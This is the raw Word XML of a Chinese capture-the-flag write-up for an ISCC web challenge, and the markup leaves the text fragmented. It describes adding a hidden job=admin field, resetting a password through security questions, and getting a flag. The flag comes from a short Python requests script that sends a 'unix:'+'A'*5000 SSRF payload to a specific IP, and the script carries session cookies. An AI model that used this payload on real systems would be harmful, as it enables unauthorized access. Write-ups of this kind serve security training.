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练武web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+掉进阿帕奇的工资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74310" cy="344551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rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开始</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随便注册账号 然后登录 发现没有用 </w:t>
      </w:r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5269865" cy="261620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5269865" cy="2601595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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须要是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>内部员工，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但我们在注册的时候 发现职称不能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>填写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但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f12可以看见</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="967740"/>
            <wp:effectExtent l="0" t="0" r="63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</w:rPr>
        <w:t>job</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏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 xml:space="preserve"> 我们可以通过抓包手动添加job=admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现也还是不行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="24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982595"/>
            <wp:effectExtent l="0" t="0" r="1016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点击信息重置 然后选择密保方式重置 然后登录成功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直接去访问/gongzi_iscc.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5332730" cy="2891790"/>
            <wp:effectExtent l="0" t="0" r="12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输入ls和11返回]B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推测可能是有xor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查看一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">dockerfile 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secret.host:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/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image: nginx</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/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container_name: secret.host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volumes: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./:/etc/nginx/conf.d/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猜测flag在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"http://secret.host/flag"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http://secret.host/flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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根据Unix:AAAA套接字漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 直接开打拿到flag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requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url='http://101.200.138.180:60000/transfer.php?dashachun=unix:'+'A'*5000+'|http://secret.host/flag'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie={'csrftoken':'lJVSlQMGe65IFy6D9JoEU92dIgOFtXBs7inja84w1RUhfSa1aL4Z7ZLkxyfVQqTm','PHPSESSID':'6v6aulahp837eokroqjmif8e48'}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>res=requests.get(url=url,cookies=cookie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(res.text)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6101606"/>
    <w:rsid w:val="7960548E"/>
    <w:rsid w:val="7D00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171</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>180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2024-05-23T05:23:45Z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